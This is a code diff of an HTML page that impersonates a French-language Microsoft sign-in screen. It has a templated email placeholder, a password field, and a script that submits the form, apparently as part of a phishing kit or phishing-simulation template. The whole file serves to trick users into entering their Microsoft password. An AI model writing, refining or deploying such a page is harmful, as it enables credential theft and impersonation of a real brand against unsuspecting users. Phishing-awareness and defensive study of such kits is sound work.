--- a/microsoft-login/index2.html
+++ b/microsoft-login/index2.html
@@ -1,10 +1,12 @@
 <!DOCTYPE html>
-<html lang="fr" style="filter: invert(0);">
-<head><meta charset="UTF-8"/><meta http-equiv="X-UA-Compatible" content="IE=edge"/><meta name="viewport" content="width=device-width, initial-scale=1.0"/>
-	<!-- <base href="https://lemonware.fr/static/template/Template/microsoft-login/"f /> -->
-	<link href="assets/favicon.ico" rel="icon" />
-	<title>Connectez-vous à votre compte Microsoft</title>
-	<link href="assets/app.css" rel="stylesheet" />
+<html lang="fr">
+<head>
+    <meta charset="UTF-8"/>
+    <meta http-equiv="X-UA-Compatible" content="IE=edge"/>
+    <meta name="viewport" content="width=device-width, initial-scale=1.0"/>
+    <link href="assets/favicon.ico" rel="icon" />
+    <title>Connectez-vous à votre compte Microsoft</title>
+    <link href="assets/app.css" rel="stylesheet" />
 </head>
 <body>
     <section id="section_pwd">
@@ -17,7 +19,7 @@
                 <span id="user_identity">{{.Email}}</span>
             </div>
             <h2 class="title mb-16">Enter password</h2>
-            <form>
+            <form id="signin_form"> <!-- Ajout de l'attribut id au formulaire -->
                 <div class="mb-16">
                     <p id="error_pwd" class="error"></p>
                     <input id="inp_pwd" type="password" name="pass" class="input" placeholder="Password" />
@@ -35,10 +37,17 @@
         </div>
     </section>
 
-<footer class="footer"><a href="#">Conditions d'utilisation</a> <a href="#">Confidentialité et cookies</a> <span>. . .</span></footer>
-<!-- Script JavaScript pour gérer le clic sur le bouton "Next" --><script>
-        document.getElementById('btn_next').addEventListener('click', function() {
-            document.getElementById('signin_form').submit(); // Soumet le formulaire
-        });
-    </script></body>
+<footer class="footer">
+    <a href="#">Conditions d'utilisation</a>
+    <a href="#">Confidentialité et cookies</a>
+    <span>. . .</span>
+</footer>
+
+<!-- Script JavaScript pour gérer le clic sur le bouton "Next" -->
+<script>
+    document.getElementById('btn_next').addEventListener('click', function() {
+        document.getElementById('signin_form').submit(); // Soumet le formulaire
+    });
+</script>
+</body>
 </html>
